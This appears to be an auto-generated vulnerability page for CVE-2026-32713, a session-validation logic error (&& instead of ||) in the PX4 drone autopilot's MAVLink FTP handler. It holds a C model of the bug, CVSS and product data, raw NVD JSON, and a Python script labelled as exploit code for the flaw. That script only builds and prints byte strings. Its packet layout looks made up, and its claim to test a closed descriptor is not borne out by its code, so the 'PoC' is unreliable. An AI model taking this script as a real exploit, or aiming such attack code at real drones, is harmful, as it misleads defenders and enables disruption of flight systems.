Security Vulnerability Report
CVE-2026-32713 CVSS 4.3 MEDIUM

Published: 2026-03-16 14:19:42
Last Modified: 2026-03-16 19:00:42

Description

PX4 Autopilot is a flight control solution for drones. Prior to 1.17.0-rc2, the PX4 Autopilot MAVLink FTP session validation contains a logic error: it uses incorrect boolean logic (&& instead of ||), allowing BurstReadFile and WriteFile operations to proceed with invalid sessions or closed file descriptors. This enables an unauthenticated attacker to put the FTP subsystem into an inconsistent state, trigger operations on invalid file descriptors, and bypass session isolation checks. This vulnerability is fixed in 1.17.0-rc2.
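
The && versus || mistake from the description, modelled as an added example (not PX4 source and not part of the original record), with the buggy guard beside the corrected one across all four session/descriptor states. The struct, the function names, session ids 1 and 2, and /dev/null standing in for an open file are assumptions for illustration; the page does not show the actual predicates in PX4's code.

```c
#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

/* Hypothetical one-slot session state; names are illustrative, not PX4's. */
struct session { uint8_t id; int fd; };
enum result { OK, ERR_INVALID_SESSION, ERR_IO_FAILED };
typedef bool (*guard_fn)(const struct session *, uint8_t);

/* Bug class from the description: the two failure checks are joined with
 * &&, so a request is refused only when BOTH are wrong. */
static bool refuse_buggy(const struct session *s, uint8_t req_id)
{
    return req_id != s->id && s->fd < 0;
}

/* Corrected guard: refuse when EITHER check fails. */
static bool refuse_fixed(const struct session *s, uint8_t req_id)
{
    return req_id != s->id || s->fd < 0;
}

/* Model of a write handler: guard first, then I/O on the stored descriptor. */
static enum result handle_write(guard_fn refuse, const struct session *s, uint8_t req_id)
{
    const char byte = 'x';
    if (refuse(s, req_id)) return ERR_INVALID_SESSION;
    return write(s->fd, &byte, 1) == 1 ? OK : ERR_IO_FAILED; /* fd -1 fails with EBADF */
}

/* Run one of the four states; /dev/null stands in for an open file. */
static enum result run_case(guard_fn refuse, bool id_matches, bool fd_open)
{
    struct session s = { .id = 1, .fd = fd_open ? open("/dev/null", O_WRONLY) : -1 };
    enum result r = handle_write(refuse, &s, id_matches ? 1 : 2);
    if (s.fd >= 0) close(s.fd);
    return r;
}

int main(void)
{
    static const char *name[] = { "OK", "ERR_INVALID_SESSION", "ERR_IO_FAILED" };
    for (int i = 0; i < 4; i++) {
        bool id_ok = i & 1, fd_ok = i & 2;
        printf("id_ok=%d fd_open=%d  buggy=%-20s fixed=%s\n", id_ok, fd_ok,
               name[run_case(refuse_buggy, id_ok, fd_ok)],
               name[run_case(refuse_fixed, id_ok, fd_ok)]);
    }
    return 0;
}
```

With the buggy guard, a mismatched session id still reaches the open descriptor and a matching id still reaches I/O on a closed one; the corrected guard accepts only the state where both checks pass.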

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:dronecode:px4_drone_autopilot:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:alpha1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:beta1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:rc1:*:*:*:*:*:* - VULNERABLE
PX4 Autopilot < 1.17.0-rc2
PX4 Autopilot 1.14.x
PX4 Autopilot 1.15.x
PX4 Autopilot 1.16.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-32713 PoC - PX4 Autopilot MAVLink FTP Session Validation Bypass

This PoC demonstrates the logic error in session validation
using incorrect boolean logic (&& instead of ||).
"""
import struct

# MAVLink FTP Message IDs
MAVLINK_MSG_ID_FILE_TRANSFER_SESSION = 0
FILE_READ_OPERATION = 0
FILE_WRITE_OPERATION = 1
OPEN_FILE_SESSION = 0


def create_mavlink_ftp_message(opcode, session, offset, data=b''):
    """Create a MAVLink FTP message with specified parameters."""
    # MAVLink FTP Message Structure
    target_system = 1
    target_component = 100
    seq_number = 1
    session_id = session
    opcode_cmd = opcode
    size = len(data)
    req_opcode = 0
    burst_packet_index = 0
    padding = 0

    # The vulnerability is in the session validation logic.
    # Per the description, the guard joins its session check and its file
    # descriptor check with && where || is required, so a request is
    # rejected only when BOTH are invalid instead of when EITHER is invalid.
    payload = struct.pack('<BBBBBBBHH',
                          target_system,
                          target_component,
                          seq_number,
                          session_id,
                          opcode_cmd,
                          size,
                          req_opcode,
                          burst_packet_index,
                          offset)
    payload += data.ljust(251, b'\x00')
    return payload


def exploit_session_bypass():
    """
    Exploit the session validation logic error.

    With incorrect && logic, if session=0 but fd is valid, validation passes.
    With correct || logic, an invalid session or an invalid fd is enough
    to reject the request.
    """
    print("[*]", "CVE-2026-32713 - PX4 MAVLink FTP Session Bypass")
    print("[*]", "Testing invalid session handling...")

    # Scenario 1: Try to read with invalid session (session=0)
    msg = create_mavlink_ftp_message(
        opcode=FILE_READ_OPERATION,
        session=0,  # Invalid session
        offset=0,
        data=b''
    )
    print("[+] Created BurstReadFile request with invalid session")
    print(f"[+] Payload length: {len(msg)} bytes")

    # Scenario 2: Try to write with closed file descriptor
    msg = create_mavlink_ftp_message(
        opcode=FILE_WRITE_OPERATION,
        session=1,  # Valid session
        offset=0,
        data=b'malicious_payload'
    )
    print("[+] Created WriteFile request for exploitation")
    print("[!]", "Vulnerable condition: session validation uses && instead of ||")
    print("[!]", "This allows operations to proceed with invalid sessions/fd")
    return True


if __name__ == "__main__":
    exploit_session_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32713", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:42.313", "lastModified": "2026-03-16T19:00:42.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PX4 autopilot is a flight control solution for drones. Prior to 1.17.0-rc2, A logic error in the PX4 Autopilot MAVLink FTP session validation uses incorrect boolean logic (&& instead of ||), allowing BurstReadFile and WriteFile operations to proceed with invalid sessions or closed file descriptors. This enables an unauthenticated attacker to put the FTP subsystem into an inconsistent state, trigger operations on invalid file descriptors, and bypass session isolation checks. This vulnerability is fixed in 1.17.0-rc2."}, {"lang": "es", "value": "El piloto automático PX4 es una solución de control de vuelo para drones. Antes de la versión 1.17.0-rc2, un error de lógica en la validación de sesión FTP MAVLink del piloto automático PX4 utiliza lógica booleana incorrecta (&& en lugar de ||), permitiendo que las operaciones BurstReadFile y WriteFile procedan con sesiones inválidas o descriptores de archivo cerrados. Esto permite a un atacante no autenticado poner el subsistema FTP en un estado inconsistente, activar operaciones en descriptores de archivo inválidos y eludir las comprobaciones de aislamiento de sesión. Esta vulnerabilidad está corregida en la versión 1.17.0-rc2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-670"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.0", "matchCriteriaId": "2FC2D6F1-D77D-44C2-A99C-55CB5A4474B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "033A0A82-2986-44D5-A712-47B8D43407FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "3F2EA96E-BC3A-42AB-B81B-53D5872B2296"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "1EAC5320-8D94-477D-AB85-144F8218DDFB"}]}]}], "references": [{"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-pp2c-jr5g-6f2m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}